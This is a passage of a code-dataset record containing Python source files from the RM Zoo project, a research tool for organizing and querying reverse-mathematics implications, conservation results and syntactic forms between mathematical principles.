"TonichaC/rmzoo", "src_encoding": "UTF-8", "text": "#! /usr/bin/env python\n\nfrom __future__ import print_function\n\nimport os, sys, uuid\n\nimport itertools\nfrom io import open\nfrom collections import defaultdict\n\nfrom version_guard import isString\n\nimport zlib\ntry:\n import cPickle as pickle\nexcept:\n import pickle\n\ntry:\n import ujson as json\nexcept:\n print('UltraJSON not available; falling back to Python library.')\n import json\n\nfrom rmBitmasks import *\nfrom renderJustification import printOp\n\nVersion = u'5.1'\nDatabaseVersion = u'5.1'\n\nclass VersionError(Exception):\n def __init__(self, targetVersion, actualVersion):\n super(VersionError, self).__init__(u'Version mismatch: found v{0}, targeting v{1}'.format(actualVersion, targetVersion))\n\nclass Zoo:\n _nextUID = 0\n \n nodes = {}\n meta = {'edgeKinds': [],\n 'colorings': [],\n 'graphviz': {}}\n \n def addNode(label, definition='', key=None, uid=None, edges={}, properties={}, tags=[]):\n if uid is None:\n uid = _nextUID\n _nextUID += 1\n \n n = Node(uid, label, definition, key, edges, properties, tags)\n if key is None:\n nodes[label] = n\n else:\n nodes[key] = n\n \n def addEdgeKind(label, functionBody):\n self.meta['edgeKinds'].append({'label': label, 'functionBody': functionBody})\n \n def addColoring(self, name, colors, labels, coloringFunction):\n self.meta['colorings'].append(Coloring(name, colors, labels, coloringFunction))\n \n def __getitem__(self, key):\n return self.nodes[key]\n \n def __setitem__(self, key, item):\n self.nodes[key] = item\n \n def __contains__(self, key):\n return (key in self.nodes)\n \n def __init__(self, edgeKinds=[], rankdir='TB'):\n self.meta['edgeKinds'] = edgeKinds\n self.meta['graphviz'] = {'rankdir': rankdir}\n\nclass Coloring:\n def __init__(self, name, colors, labels, coloringFunction):\n self.label = name\n self.colors = [{'color': color, 'label': label} for color,label in zip(colors,labels)]\n self.coloring = coloringFunction\n\nclass Node:\n def __init__(self, uid, label, definition='', key=None, edges={}, properties={}, tags=[]):\n if key is None:\n key = label\n \n self.uid = uid\n self.label = label\n self.definition = definition\n self.key = key\n self.edges = edges\n self.properties = properties\n self.tags = tags\n \n def addEdge(self, dstKey, properties={}):\n self.edges[dstKey] = Edge(self.key, dstKey, properties)\n \n def addProperty(self, name, 
justification, value=None, description='', uid=None):\n self.properties[name] = Property(justification, value, description, uid)\n\nclass Edge:\n def __init__(self, srcKey, dstKey, properties={}):\n self.srcKey = srcKey\n self.dstKey = dstKey\n self.properties = properties\n \n def addProperty(self, name, justification, value=None, description='', uid=None):\n self.properties[name] = Property(justification, value, description, uid)\n\nclass Property:\n def __init__(self, justification, value=None, description='', uid=None):\n if uid is None:\n uid = uuid.uuid4()\n \n self.value = value\n self.justification = justification\n self.description = description\n self.uid = uid\n\nclass Justification:\n weight = 0\n direct = None\n composite = None\n \n def __init__(self, direct=None, composite=None, weight=None):\n if direct is None and composite is None:\n raise ValueError('Justifications must contain some justification.')\n if direct is not None and composite is not None:\n raise ValueError('Justifications are either direct or composite, not both.')\n \n if direct is not None:\n self.weight = 1\n self.direct = direct\n \n if composite is not None:\n if weight is None:\n raise ValueError('Composite justifications must specify their weights.')\n \n self.weight = weight\n self.composite = composite\n \ndef loadDatabase(databaseName, quiet=False):\n with open(databaseName, mode='rb') as databaseFile:\n compressedDatabase = databaseFile.read()\n pickledDatabase = zlib.decompress(compressedDatabase)\n setDatabase(pickle.loads(pickledDatabase))\n\ndef getDatabase():\n return {'version': DatabaseVersion,\n 'principles': principles,\n 'implication': (implies, notImplies),\n 'conservation': (conservative, nonConservative),\n 'form': form,\n 'primary': (primary, primaryIndex),\n 'justify': justify}\ndef setDatabase(database):\n if database['version'] != DatabaseVersion:\n raise VersionError(DatabaseVersion, database['version'])\n \n global principles\n principles = database['principles']\n \n global implies, notImplies\n implies, notImplies = database['implication']\n \n global conservative, nonConservative\n conservative, nonConservative = database['conservation']\n \n global form\n form = database['form']\n \n global primary, primaryIndex\n primary, primaryIndex = database['primary']\n \n global justify\n justify = database['justify']\n\nif __name__ == '__main__':\n databaseTitle = 'database'\n if os.path.splitext(databaseTitle)[1] == '':\n databaseName = databaseTitle + os.extsep + 'dat'\n else:\n databaseName = databaseTitle\n loadDatabase(databaseName)\n \n primaryIndex += sorted(principles - primary)\n \n meta = {\n 'tags': [],\n 'edgeKinds': [],\n 'colorings': [],\n 'about': {'description': 'The <a href=\"https://rmzoo.math.uconn.edu/\">RM Zoo</a> is a program to '\n 'help organize reverse-mathematical relations between mathematical '\n 'principles, particularly those that fail to be equivalent to any of the '\n 'big five subsystems of second-order arithmetic. Its primary goal is to '\n 'make it easier to see known results and open questions, and thus '\n 'hopefully to serve as a useful tool to researchers in the field. 
As a '\n 'secondary goal, the Zoo provides an interactive annotated bibliography '\n 'of the field, collecting results in a standard machine-readable format.'},\n 'graphviz': {}\n }\n\n translationFunction = \"if('{0}' in edge.properties) return 1; \" \\\n \"if('{1}' in edge.properties) return 0; \" \\\n \"return 2;\"\n for red in Reduction:\n if red == Reduction.none: continue\n \n posName = red.name + u'i'\n negName = red.name + u'ni'\n \n kindNode = {'label': '$\\rightarrow_{\\rm ' + red.name + '}$',\n 'key': posName,\n 'edges': [r.name + u'i' for r in Reduction.list(Reduction.weaker(red) & ~red)]}\n kind = {'label': '$\\rightarrow_{\\rm ' + red.name + '}$',\n 'functionBody': translationFunction.format(posName, negName),\n 'node': kindNode}\n meta['edgeKinds'].append(kind)\n for f in Form:\n if f == Form.none: continue\n \n posName = f.name + u'c'\n negName = f.name + u'nc'\n \n #TODO: Implement better labels for conservation results\n kindNode = {'label': posName,\n 'key': posName,\n 'edges': [r.name + u'i' for r in Reduction.list(Reduction.weaker(red) & ~red)]}\n kind = {'label': posName,\n 'functionBody': translationFunction.format(posName, negName),\n 'node': kindNode}\n \n nodes = {}\n for i,p in enumerate(primaryIndex):\n nodes[p] = dict()\n nodes[p]['uid'] = i\n \n #TODO: Implement labels\n nodes[p]['label'] = p\n \n #TODO: Implement definitions\n nodes[p]['definition'] = ''\n \n nodes[p]['edges'] = {dst:{'srcKey':p,\n 'dstKey':dst,\n 'properties':dict()} for dst in principles}\n nodes[p]['properties'] = {}\n nodes[p]['tags'] = []\n uid = i+1\n \n properties = {}\n for p in sorted(principles):\n for f in Form.list(form[p]):\n #TODO: Implement justifications for forms\n properties[(p, u'form', f)] = {'uid': uid,\n 'value': f.name,\n 'justification': {'weight': 1,\n 'direct': 'Observed'}}\n nodes[p]['properties'][f.name] = properties[(p, u'form', f)]\n uid += 1\n \n for f,j in justify.items():\n if f in properties:\n continue\n \n toJustify = [(f, j, {'uid': uid})]\n uid += 1\n while toJustify:\n fact,jst,prop = toJustify.pop()\n done = True\n if isString(jst):\n prop['justification'] = {'weight': 1, 'direct': jst}\n elif all(ref in properties for ref in jst):\n prop['justification'] = {'weight': 1 + sum(properties[ref]['justification']['weight'] for ref in jst),\n 'composite': [properties[ref]['uid'] for ref in jst]}\n else:\n done = False\n toJustify.append((fact, jst, prop))\n for ref in jst:\n if ref in properties:\n continue\n toJustify.append((ref, justify[ref], {'uid': uid}))\n uid += 1\n if done:\n properties[fact] = prop\n \n a,op,b = fact\n opCtx,opCore = op\n if opCore in u'->':\n coreName = u'i'\n elif opCore == u'-|>':\n coreName = u'ni'\n else:\n coreName = opCore\n opName = opCtx.name + coreName\n nodes[a]['edges'][b]['properties'][opName] = prop\n \n with open('rmzoo.json', 'w') as f:\n json.dump({'nodes': nodes, 'meta': meta}, f, sort_keys=True, indent=4)\n" }, { "alpha_fraction": 0.5344477295875549, "alphanum_fraction": 0.582109808921814, "avg_line_length": 27.203821182250977, "blob_id": "b6640429366d2e8fe0cc55fc769966c480cf88f6", "content_id": "df33faa03cc34755f595249b69e70f15ac91f3a3", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4427, "license_type": "permissive", "max_line_length": 98, "num_lines": 157, "path": "/rmBitmasks.py", "repo_name": "TonichaC/rmzoo", "src_encoding": "UTF-8", "text": "from __future__ import print_function, unicode_literals\n\nfrom enum import Enum\n\nfrom version_guard 
import lru_cache\n\nclass BitmaskEnum(int, Enum):\n def __new__(cls, value=None):\n if value is None:\n if len(cls.__members__) == 0:\n value = 0\n else:\n value = 1 << (len(cls.__members__) - 1)\n \n obj = int.__new__(cls, value)\n obj._value_ = value\n return obj\n \n @staticmethod\n def isPresent(x,magic_num):\n return (x & magic_num) != 0\n \n @classmethod\n @lru_cache(maxsize=256)\n def strongest(cls,magic_num):\n if magic_num == 0:\n return cls(0)\n else:\n return cls(1 << (magic_num.bit_length() - 1))\n \n @classmethod\n @lru_cache(maxsize=256)\n def weakest(cls,magic_num):\n if magic_num == 0:\n return cls.none\n else:\n return cls(magic_num & -magic_num)\n \n @classmethod\n @lru_cache(maxsize=256)\n def list(cls,magic_num):\n return [x for x in cls if cls.isPresent(x, magic_num)]\n \n @classmethod\n def fromString(cls,s):\n try:\n return getattr(cls, s)\n except AttributeError:\n raise NotImplementedError(\"The {0} `{1}` is not implemented.\".format(cls.__name__, s))\n\nclass Reduction(BitmaskEnum):\n none = 0\n w = 1 << 0\n RCA = 1 << 1\n c = 1 << 2\n sc = 1 << 3\n gW = 1 << 4\n W = 1 << 5\n sW = 1 << 6\n \n @classmethod\n def fromString(cls,s):\n try:\n return cls.alias[s]\n except KeyError:\n try:\n return getattr(cls, s)\n except AttributeError:\n raise NotImplementedError(\"The reduction `{}` is not implemented.\".format(s))\n\nReduction.alias = {u'': Reduction.RCA,\n u'gc': Reduction.w}\n\ndef noReduction():\n return Reduction.none\n\nclass Form(BitmaskEnum):\n none = 0\n Sig02 = 1 << 10\n Pi02 = 1 << 9\n Sig03 = 1 << 8\n Pi03 = 1 << 7\n uPi03 = 1 << 6\n Sig04 = 1 << 5\n Pi04 = 1 << 4\n Pi11 = 1 << 3\n rPi12 = 1 << 2\n Pi12 = 1 << 1\n Pi13 = 1 << 0\n\ndef noForm():\n return Form.none\n\ndef _completeImplications(enum, forward):\n for c in enum:\n if c == enum.none: continue\n for a in enum:\n if a == enum.none: continue\n \n if enum.isPresent(c, forward[a]):\n forward[a] |= forward[c]\n\ndef _reverseImplications(enum, forward):\n reverse = {enum.none: enum.none}\n for p0 in enum:\n if p0 == enum.none: continue\n \n reverse[p0] = enum.none\n for p1 in enum:\n if p1 == enum.none: continue\n \n if enum.isPresent(p0, forward[p1]):\n reverse[p0] |= p1\n return reverse\n\n_R_WEAKER = {r:r for r in Reduction}\n\n_R_WEAKER[Reduction.RCA] |= Reduction.w # RCA -> w\n\n_R_WEAKER[Reduction.sc] |= Reduction.c # sc -> c\n_R_WEAKER[Reduction.c] |= Reduction.w # c -> w\n\n_R_WEAKER[Reduction.sW] |= Reduction.W | Reduction.sc # sW -> W, sc\n_R_WEAKER[Reduction.W] |= Reduction.gW | Reduction.c # W -> gW, c\n_R_WEAKER[Reduction.gW] |= Reduction.w # gW -> w\n\n_completeImplications(Reduction, _R_WEAKER)\n\n_R_STRONGER = _reverseImplications(Reduction, _R_WEAKER)\n\nReduction.weaker = lambda r: _R_WEAKER[r]\nReduction.stronger = lambda r: _R_STRONGER[r]\n\n_F_STRONGER = {f:f for f in Form}\n\n_F_STRONGER[Form.Pi13] |= Form.Pi12 # Pi12 implies Pi13\n_F_STRONGER[Form.Pi12] |= Form.rPi12 # rPi12 implies Pi12\n_F_STRONGER[Form.rPi12] |= Form.Pi11 # Pi11 implies rPi12\n_F_STRONGER[Form.Pi11] |= Form.Sig04 # Sig04 implies Pi11\n_F_STRONGER[Form.Pi11] |= Form.Pi04 # Pi04 implies Pi11\n_F_STRONGER[Form.Pi11] |= Form.uPi03 # uPi03 implies Pi11\n_F_STRONGER[Form.Sig04] |= Form.Sig03 # Sig03 implies Sig04\n_F_STRONGER[Form.Sig04] |= Form.Pi03 # Pi03 implies Sig04\n_F_STRONGER[Form.Pi04] |= Form.Sig03 # Sig03 implies Pi04\n_F_STRONGER[Form.Pi04] |= Form.Pi03 # Pi03 implies Pi04\n_F_STRONGER[Form.uPi03] |= Form.Pi03 # Pi03 implies uPi03\n_F_STRONGER[Form.Sig03] |= Form.Sig02 # Sig02 implies 
Sig03\n_F_STRONGER[Form.Sig03] |= Form.Pi02 # Pi02 implies Sig03\n_F_STRONGER[Form.Pi03] |= Form.Sig02 # Sig02 implies Pi03\n_F_STRONGER[Form.Pi03] |= Form.Pi02 # Pi02 implies Pi03\n\n_completeImplications(Form, _F_STRONGER)\n\n_F_WEAKER = _reverseImplications(Form, _F_STRONGER)\n\nForm.weaker = lambda f: _F_WEAKER[f]\nForm.stronger = lambda f: _F_STRONGER[f]" }, { "alpha_fraction": 0.5429601073265076, "alphanum_fraction": 0.5495439171791077, "avg_line_length": 35.15292739868164, "blob_id": "bb8d0339eca1975cee5ce7190ec57473c133537f", "content_id": "610a686931b1850467b07d354d59878a44733d7b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 27188, "license_type": "permissive", "max_line_length": 179, "num_lines": 752, "path": "/rmzoo.py", "repo_name": "TonichaC/rmzoo", "src_encoding": "UTF-8", "text": "#! /usr/bin/env python\n\n##################################################################################\n#\n# The Reverse Mathematics Zoo\n# by Damir Dzhafarov\n# - Version 1.0 started August, 2010\n# - Version 2.0 started August, 2013\n# Revised by Eric Astor\n# - Version 3.0 - 29 May 2016\n# - Version 4.0 - started 30 May 2016\n# - Version 4.1 - optimizations & refactoring, started 2 July 2016\n# - Version 4.2 - new forms and reasoning, started 12 July 2016\n# - Version 4.3 - changed internal representations, started 21 July 2016\n# - Version 4.4 - moved to a shelf database, started 25 July 2016\n# - Version 5.0 - clean implementation of inference rules, started 1 August 2016\n# - Version 5.1 - reverted from shelf database for cross-platform compatibility, started 16 August 2016\n# Documentation and support: http://rmzoo.uconn.edu\n#\n##################################################################################\n\nfrom __future__ import print_function\n\nimport os, sys\n\nimport itertools\nfrom io import open\nfrom collections import defaultdict\n\nfrom version_guard import isString\n\nimport zlib\ntry:\n import cPickle as pickle\nexcept:\n import pickle\n\nfrom rmupdater import standardizeFact\n\ndef eprint(*args, **kwargs):\n print(*args, file=sys.stderr, **kwargs)\n\nError = False\ndef warning(s):\n global Error\n Error = True\n eprint(s)\n\ndef error(s): # Throw exception\n raise Exception(s)\n\nDate = u'16 August 2016'\nVersion = u'5.1'\nDatabaseVersion = u'5.1'\n\nfrom rmBitmasks import *\nfrom renderJustification import *\n\n_FORM_COLOR = {Form.none: \"white\",\n Form.weaker(Form.Pi11): \"pink\",\n Form.weaker(Form.rPi12): \"cyan\"}\n_CONS_COLOR = {Form.none: \"white\",\n Form.weaker(Form.Pi11): \"pink\",\n Form.weaker(Form.rPi12): \"cyan\"}\n \n##################################################################################\n#\n# GET OPTIONS\n#\n##################################################################################\n \neprint(u'\\nRM Zoo (v{0})'.format(Version))\n\nfrom optparse import OptionParser, OptionGroup\n\nparser = OptionParser(u'Usage: %prog [options] [database]', version=u'%prog {0} ({1})'.format(Version, Date))\n\nparser.set_defaults(implications=False,nonimplications=False,omega=False,onlyprimary=False,weak=False,strong=False,showform=False,conservation=False,add_principles=False)\n\nparser.add_option('-i', action='store_true', dest='implications',\n help=u'Display implications between principles.')\nparser.add_option('-n', action='store_true', dest='nonimplications',\n help=u'Display non-implications between principles.')\nparser.add_option('-w', action='store_true', dest='weak',\n 
help=u'Display weakest non-redundant open implications.')\nparser.add_option('-s', action='store_true', dest='strong',\n help=u'Display strongest non-redundant open implications.')\nparser.add_option('-t', dest='reducibility', default='RCA',\n help=u'Display facts relative to REDUCIBILITY-implications.')\nparser.add_option('-o', action='store_const', dest='reducibility', const='w',\n help=u'Display only facts that hold in omega models.')\nparser.add_option('-p', action='store_true', dest='onlyprimary',\n help=u'Display only facts about primary principles.')\n \nparser.add_option('-f', action='store_true', dest='showform',\n help=u'Indicate syntactic forms of principles.')\nparser.add_option('-c', action='store_true', dest='conservation',\n help=u'Display known conservation results.')\n \nparser.add_option('-r', dest='restrict_string', metavar='CLASS',\n help=u'Restrict to only the principles in CLASS.')\nparser.add_option('--omit', dest='omit_string', metavar='CLASS',\n help=u'Omit all principles in CLASS.')\n\nparser.add_option('-q', dest='query_string', metavar='FACT',\n help=u'Show whether FACT is known, and if so, its justification.')\nparser.add_option('-F', dest='query_file', metavar='FILE',\n help=u'Query whether all facts in FILE are known, and return a list of all unknown facts.')\n\nparser.add_option('--force', action='store_true', dest='add_principles',\n help=u'Allow queries involving novel conjunctions from the database. (WARNING: slow)')\n\n(options, args) = parser.parse_args()\n\nImplications = options.implications\nNonImplications = options.nonimplications\nWeak = options.weak\nStrong = options.strong\nReducibility = Reduction.fromString(options.reducibility)\nOnlyPrimary = options.onlyprimary\nShowForm = options.showform\nConservation = options.conservation\nRestrict = options.restrict_string\nOmissions = options.omit_string\nif Restrict:\n rSet = set()\n for p in Restrict.split():\n splitP = p.split(u'+')\n setP = set(splitP)\n p = u'+'.join(sorted(setP))\n \n rSet.add(p)\n rSet.update(splitP)\n Restrict = rSet\nif Omissions:\n Omissions = set(Omissions.split())\nQuery = options.query_string\nQueryFile = options.query_file\nAddPrinciples = options.add_principles\n \n# Give errors if bad options chosen\n\nif not Implications and not NonImplications and not OnlyPrimary and not Restrict and not Weak and not Strong and not ShowForm and not Conservation and not Query and not QueryFile:\n parser.error(u'No options selected.')\nif OnlyPrimary:\n if not Implications and not NonImplications and not Weak and not Strong and not ShowForm and not Conservation:\n parser.error(u'Option -p only works if one of -i, -n, -w, -s, -f, or -c is selected.')\nif Restrict or Omissions:\n if Restrict and Omissions:\n parser.error(u'Options -r and --omit are incompatible.')\n if not Implications and not NonImplications and not Weak and not Strong and not ShowForm and not Conservation:\n parser.error(u'Options -r and --omit only work if one of -i, -n, -w, -s, -f, or -c is selected.')\nif Query:\n if Implications or NonImplications or Weak or Strong or ShowForm or Conservation or Restrict or OnlyPrimary or QueryFile:\n parser.error(u'Option -q does not work with any other option (except --force).')\nif QueryFile:\n if Implications or NonImplications or Weak or Strong or ShowForm or Conservation or Restrict or OnlyPrimary or Query:\n parser.error(u'Option -F does not work with any other option (except --force).')\n\nif len(args) > 1:\n parser.error(u'Too many arguments.')\nif len(args) > 0:\n 
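# The optional positional argument names the database file produced by rmupdater.\n    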
databaseTitle = args[0]\nelse:\n eprint(u'No database title specified; defaulting to \"database\".')\n databaseTitle = 'database'\n\nif os.path.splitext(databaseTitle)[1] == '':\n databaseName = databaseTitle + os.extsep + 'dat'\nelse:\n databaseName = databaseTitle\n\n \n##################################################################################\n#\n# IMPORT AND ORGANIZE DATA\n#\n##################################################################################\n\neprint(u'Importing and organizing data...')\n\nclass VersionError(Exception):\n def __init__(self, targetVersion, actualVersion):\n super(VersionError, self).__init__(u'Version mismatch: found v{0}, targeting v{1}'.format(actualVersion, targetVersion))\n\nprinciples = {}\nimplies, notImplies = {}, {}\nconservative, nonConservative = {}, {}\nform = {}\nprimary, primaryIndex = {}, {}\njustify = {}\ndef getDatabase():\n return {'version': DatabaseVersion,\n 'principles': principles,\n 'implication': (implies, notImplies),\n 'conservation': (conservative, nonConservative),\n 'form': form,\n 'primary': (primary, primaryIndex),\n 'justify': justify}\n\nequivalent = defaultdict(set)\ndef setDatabase(database):\n if database['version'] != DatabaseVersion:\n raise VersionError(DatabaseVersion, database['version'])\n \n global principles\n principles = database['principles']\n \n global implies, notImplies\n implies, notImplies = database['implication']\n \n global equivalent\n for a in principles:\n for b in principles:\n for r in Reduction.list(implies[(a,b)] & implies[(b,a)]):\n equivalent[(a, r)].add(b)\n \n global conservative, nonConservative\n conservative, nonConservative = database['conservation']\n \n global form\n form = database['form']\n \n global primary, primaryIndex\n primary, primaryIndex = database['primary']\n \n global justify\n justify = database['justify']\n\ndef loadDatabase(databaseName, quiet=False):\n with open(databaseName, mode='rb') as databaseFile:\n compressedDatabase = databaseFile.read()\n pickledDatabase = zlib.decompress(compressedDatabase)\n setDatabase(pickle.loads(pickledDatabase))\nloadDatabase(databaseName)\n\ndef knownEquivalent(a, reduction, justification=True):\n if a in principles:\n if justification:\n return (a, None)\n else:\n return a\n \n splitA = a.split(u'+')\n if any((p not in principles) for p in splitA):\n if justification:\n return (None, None)\n else:\n return None\n \n aPrime = None\n for equiv in itertools.product(*(equivalent[(p, reduction)] for p in splitA)):\n aPrime = u'+'.join(sorted(set(equiv)))\n if aPrime in principles:\n if justification:\n equivJst = tuple((p, (reduction, u'<->'), q) for (p,q) in zip(splitA, equiv) if p != q)\n return (aPrime, equivJst)\n else:\n return aPrime\n \n if justification:\n return (None, None)\n else:\n return None\n \ndef queryDatabase(a, op, b, justification=True):\n if op[1] in (u'c', u'nc'):\n reduction = Reduction.RCA\n else:\n reduction = op[0]\n \n if justification:\n aPrime, aJst = knownEquivalent(a, reduction, justification)\n bPrime, bJst = knownEquivalent(b, reduction, justification)\n if aJst is not None:\n justify[(a, (reduction, u'<->'), aPrime)] = aJst\n if bJst is not None:\n justify[(b, (reduction, u'<->'), bPrime)] = bJst\n else:\n aPrime = knownEquivalent(a, reduction, justification)\n bPrime = knownEquivalent(b, reduction, justification)\n \n aKnown = aPrime is not None\n bKnown = bPrime is not None\n \n aConjunct = (not aKnown) and all((p in principles) for p in a.split(u'+'))\n bConjunct = (not bKnown) and all((p in 
principles) for p in b.split(u'+'))\n    \n    s = u''\n    if not aKnown and not bKnown:\n        s += u'{0} and {1} are unknown principles.'.format(a, b)\n    elif not aKnown:\n        s += u'{0} is an unknown principle.'.format(a)\n    elif not bKnown:\n        s += u'{0} is an unknown principle.'.format(b)\n    if aConjunct and bConjunct:\n        s += u'\\n\\tHOWEVER: {0} and {1} are conjunctions of known principles; try running with --force.'.format(a, b)\n    elif aConjunct and bKnown:\n        s += u'\\n\\tHOWEVER: {0} is a conjunction of known principles; try running with --force.'.format(a)\n    elif bConjunct and aKnown:\n        s += u'\\n\\tHOWEVER: {0} is a conjunction of known principles; try running with --force.'.format(b)\n    if len(s) > 0: error(s)\n    \n    if (aPrime, op, bPrime) in justify:\n        if not justification:\n            return True\n        else:\n            r = []\n            if a != aPrime or b != bPrime:\n                r.append(u'\\n')\n            if a != aPrime:\n                r.append(u'NOTE: {0} is not a known principle, but is equivalent to {1}\\n'.format(a, aPrime))\n            if b != bPrime:\n                r.append(u'NOTE: {0} is not a known principle, but is equivalent to {1}\\n'.format(b, bPrime))\n            \n            if a != aPrime:\n                r.append(printJustification((a, (reduction, u'<->'), aPrime), justify))\n            if b != bPrime:\n                r.append(printJustification((b, (reduction, u'<->'), bPrime), justify))\n            r.append(printJustification((aPrime, op, bPrime), justify))\n            return u''.join(r)\n    else:\n        return False\n\n##################################################################################\n#\n# IF RESTRICT OR QUERY: VALIDATE CLASS\n#\n##################################################################################\n\nif Restrict:\n    \n    for a in Restrict: # Give warnings if CLASS is not a subset of principles\n        if a not in principles:\n            error(a + u' is not in the database.')\n\nif Omissions:\n    Restrict = principles - Omissions\n\n##################################################################################\n#\n# IF QUERY: GIVE ANSWER\n#\n##################################################################################\n\nfrom pyparsing import *\n\nname = Word( alphas+\"_+^{}\\\\$\", alphanums+\"_+^{}$\\\\\")\n\n_reductionName = NoMatch()\nfor r in Reduction:\n    if r != Reduction.none:\n        _reductionName |= Literal(r.name)\nfor r in Reduction.alias:\n    if r != u'':\n        _reductionName |= Literal(r)\n_reductionType = _reductionName.setParseAction(lambda s,l,t: [Reduction.fromString(t[0])])\nreductionType = Optional(_reductionType, default=Reduction.RCA)\npostfixReductionType = Optional(Suppress(Literal(\"_\")) + _reductionType, default=Reduction.RCA)\n\nimplication = (reductionType + Literal(\"->\")) | (Literal(\"=>\") + postfixReductionType).setParseAction(lambda s,l,t: [t[1], \"->\"])\nnonImplication = (reductionType + Literal(\"-|>\")) | (Literal(\"=/>\") + postfixReductionType).setParseAction(lambda s,l,t: [t[1], \"-|>\"])\nequivalence = (reductionType + Literal(\"<->\")) | (Literal(\"<=>\") + postfixReductionType).setParseAction(lambda s,l,t: [t[1], \"<->\"])\n\nreduction = (Literal(\"<=\") + postfixReductionType).setParseAction(lambda s,l,t: [t[1], \"<=\"])\nnonReduction = (Literal(\"</=\") + postfixReductionType).setParseAction(lambda s,l,t: [t[1], \"</=\"])\n\n_formName = NoMatch()\nfor f in Form:\n    if f != Form.none:\n        _formName |= Literal(f.name)\nformType = _formName.setParseAction(lambda s,l,t: [Form.fromString(t[0])])\n\nconservation = formType + Literal(\"c\")\nnonConservation = (Literal(\"n\") + formType + Literal(\"c\")).setParseAction(lambda s,l,t: [t[1], \"nc\"])\n\noperator = implication | nonImplication | reduction | 
nonReduction | equivalence | conservation | nonConservation\n\nif Query:\n query = name + Group(operator) + name + StringEnd()\n Query = query.parseString(Query)\n \n op = Query[1]\n if not isString(op):\n op = tuple(op)\n a, op, b = standardizeFact(Query[0], op, Query[2])\n \n if not (a in principles and b in principles) and AddPrinciples:\n abort = False\n for p in a.split(u'+'):\n if p not in principles:\n abort = True\n break\n for p in b.split(u'+'):\n if p not in principles:\n abort = True\n break\n if not abort:\n eprint(u'Adding new principles...')\n import rmupdater\n rmupdater.setDatabase(getDatabase())\n if a not in principles:\n rmupdater.addPrinciple(a)\n if b not in principles:\n rmupdater.addPrinciple(b)\n rmupdater.principlesList = sorted(rmupdater.principles)\n rmupdater.deriveInferences(quiet=False)\n setDatabase(rmupdater.getDatabase())\n \n jst = queryDatabase(a, op, b)\n if jst:\n print(u'Justification for the fact \"{0}\":\\n{1}'.format(printFact(a, op, b), jst))\n else:\n print(u'\\nError: Unknown fact \"{0}\"'.format(printFact(a, op, b)))\n opp = None # opposite operation\n if op[1] == u'->':\n opp = (op[0], u'-|>')\n elif op[1] == u'-|>':\n opp = (op[0], u'->')\n elif op[1] == u'c':\n opp = (op[0], u'nc')\n elif op[1] == u'nc':\n opp = (op[0], u'c')\n \n if opp is not None:\n jst = queryDatabase(a, opp, b)\n if jst:\n print(u'CONTRADICTING fact known! Justification for the fact \"{0}\":\\n{1}'.format(printFact(a, opp, b), jst))\n if op[1] == u'<->':\n opp = (op[0], u'-|>')\n jst = queryDatabase(a, opp, b)\n if jst:\n print(u'CONTRADICTING fact known! Justification for the fact \"{0}\":\\n{1}'.format(printFact(a, opp, b), jst))\n else:\n jst = queryDatabase(b, opp, a)\n if jst:\n print(u'CONTRADICTING fact known! Justification for the fact \"{0}\":\\n{1}'.format(printFact(b, opp, a), jst))\n\nif QueryFile:\n parenth = Literal('\"')\n justification = QuotedString('\"\"\"',multiline=True) | quotedString.setParseAction(removeQuotes)\n \n fact = name + ((Group(operator) + name + Suppress(Optional(justification))) | (Literal('form') + formType) | (Literal('is') + Literal('primary')))\n \n queries = []\n with open(QueryFile, encoding='utf-8') as f:\n for q in f.readlines():\n q = q.strip()\n if len(q) == 0 or q[0] == u'#': continue\n \n Q = fact.parseString(q)\n if Q[1] == u'is' and Q[2] == u'primary': continue\n \n a,op,b = Q\n if not isString(op):\n op = tuple(op)\n a,op,b = standardizeFact(a, op, b)\n \n queries.append((a, op, b, q))\n \n if AddPrinciples:\n newPrinciples = set()\n unknownPrinciples = set()\n for (a, op, b, q) in queries:\n unknown = False\n \n Q = a.split(u'+')\n if op != u'form':\n Q.extend(b.split(u'+'))\n for p in Q:\n if p not in principles:\n unknownPrinciples.add(p)\n unknown = True\n if not unknown:\n if a not in principles: newPrinciples.add(a)\n if op != u'form' and b not in principles: newPrinciples.add(b)\n \n if len(unknownPrinciples) > 0:\n warning(u'Unknown principles: {0}\\n'.format(u', '.join(sorted(unknownPrinciples))))\n if len(newPrinciples) > 0:\n eprint(u'Adding {0:,d} new principles...'.format(len(newPrinciples)))\n import rmupdater\n rmupdater.setDatabase(getDatabase())\n for p in newPrinciples:\n rmupdater.addPrinciple(p)\n rmupdater.principlesList = sorted(rmupdater.principles)\n rmupdater.deriveInferences(quiet=False)\n setDatabase(rmupdater.getDatabase())\n \n for (a, op, b, q) in queries:\n s = u''\n known = False\n if op == u'form':\n known = Form.isPresent(b, form[a])\n else:\n try:\n known = queryDatabase(a, op, b, 
justification=False)\n except Exception as e:\n s += u'\\n' + str(e)\n \n if not known:\n s += u'\\nUnknown fact: ' + q\n \n if len(s) > 0:\n warning(s)\n eprint(u'\\nFinished.')\n\n##################################################################################\n#\n# IF RESTRICT: DELETE PRINCIPLES NOT IN CLASS\n#\n##################################################################################\n\nif Restrict:\n principles &= Restrict\n \n##################################################################################\n#\n# IF DIAGRAM: REMOVE REDUNDANT IMPLICATIONS AND NON-IMPLICATIONS \n#\n##################################################################################\n\nif Implications or NonImplications or Weak or Strong:\n\n eprint(u'Removing redundant facts for clarity...')\n \n # Create print versions of functions\n \n simpleImplies = defaultdict(bool)\n printImplies = defaultdict(bool)\n \n simpleNotImplies = defaultdict(bool)\n printNotImplies = defaultdict(bool)\n \n equivalent = defaultdict(bool)\n \n simpleConservative = defaultdict(noForm)\n printConservative = defaultdict(noForm)\n \n printWeakOpen = defaultdict(bool)\n printStrongOpen = defaultdict(bool)\n \n for a in principles:\n for b in principles:\n if a == b: # Remove self-relations to not confuse DOT reader\n continue\n \n simpleImplies[(a,b)] = Reduction.isPresent(Reducibility, implies[(a,b)])\n printImplies[(a,b)] = simpleImplies[(a,b)]\n \n simpleNotImplies[(a,b)] = Reduction.isPresent(Reducibility, notImplies[(a,b)])\n printNotImplies[(a,b)] = simpleNotImplies[(a,b)]\n \n if simpleImplies[(a,b)] and simpleImplies[(b,a)]:\n equivalent[(a,b)] = True\n equivalent[(b,a)] = True\n \n simpleConservative[(a,b)] = conservative[(a,b)]\n printConservative[(a,b)] = simpleConservative[(a,b)]\n \n # Assign primaries and make them unique\n \n for a in sorted(principles):\n currentPrimary = a\n found = False\n toRemove = set()\n for b in primaryIndex:\n if currentPrimary == b:\n found = True\n continue\n if 